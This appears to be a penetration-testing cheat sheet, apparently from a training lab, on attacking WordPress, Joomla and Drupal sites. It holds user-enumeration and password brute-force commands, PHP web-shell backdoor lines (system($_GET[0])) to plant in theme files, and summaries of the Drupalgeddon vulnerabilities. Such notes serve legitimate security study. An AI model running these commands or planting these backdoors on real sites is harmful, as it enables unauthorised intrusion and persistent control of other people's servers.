CMS attacks

Common application attacks

This page covers attacks on these applications:

1. WordPress

2. Joomla

3. Drupal

WordPress

Grabbing information from the site

$ curl -s http://blog.inlanefreight.local | grep WordPress # WP version
$ curl -s http://blog.inlanefreight.local/ | grep themes # active theme
$ curl -s http://blog.inlanefreight.local/ | grep plugins # installed plugins

WordPress /robots.txt

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://<site>/wp-sitemap.xml

Key WordPress files

index.php
license.txt
wp-activate.php
wp-admin/login.php
wp-admin/wp-login.php
/login.php
/wp-login.php
xmlrpc.php
wp-config.php

Key WordPress folders

/uploads
/wp-contents
/wp-includes

Enumerating Users

$ curl -s -I -X GET http://SERVER:PORT/?author=100

$ curl http://SERVER:PORT/wp-json/wp/v2/users | jq

[
  {
    "id": 1,
    "name": "admin",
    "url": "",
    "description": "",
    "link": "http://SERVER:PORT/index.php/author/admin/",
    <SNIP>
  },
  {
    "id": 2,
    "name": "ch4p",
    "url": "",
    "description": "",
    "link": "http://SERVER:PORT/index.php/author/ch4p/",
    <SNIP>
  },
<SNIP>

Attacking accounts

Brute force using xmlrpc.php and wpscan

$ wpscan --password-attack xmlrpc -t 20 -U admin -P passwords.txt --url http://SERVER:PORT

Backdoors in WordPress Admin

After logging in as admin, we can add a backdoor to their themes by placing this line in 404.php

system($_GET[0]);

Joomla

Joomla robots.txt

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

Getting Joomla version

$ curl -s http://target/administrator/manifests/files/joomla.xml | xmllint --format -

Enumerating with droopescan

$ droopescan scan joomla --url http://target/

Brute forcing with joomla-bruteforce

https://github.com/ajnik/joomla-bruteforce

$ sudo python3 joomla-brute.py -u http://target -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

Backdoors as Joomla Admin

After logging in as admin, we can add a backdoor to their themes by placing this line in error.php

system($_GET[0]);

Drupal

Enumerating with droopescan

$ droopescan scan drupal --url http://target/

RCE

Enable PHP Filter Module and create a new Basic Page that contains a PHP webshell. Make sure to set the Text format to PHP

<?php
system($_GET['3232ewql']);
?>

In older Drupal version, PHP Filter Module comes installed by default. In newer versions, we will need to install it ourselves either through the admin page, or uploading it via ftp

Drupalgeddons

• CVE-2014-3704, known as Drupalgeddon, affects versions 7.0 up to 7.31 and was fixed in version 7.32. This was a pre-authenticated SQL injection flaw that could be used to upload a malicious form or create a new admin user.
• CVE-2018-7600, also known as Drupalgeddon2, is a remote code execution vulnerability, which affects versions of Drupal prior to 7.58 and 8.5.1. The vulnerability occurs due to insufficient input sanitization during user registration, allowing system-level commands to be maliciously injected.
• CVE-2018-7602, also known as Drupalgeddon3, is a remote code execution vulnerability that affects multiple versions of Drupal 7.x and 8.x. This flaw exploits improper validation in the Form API.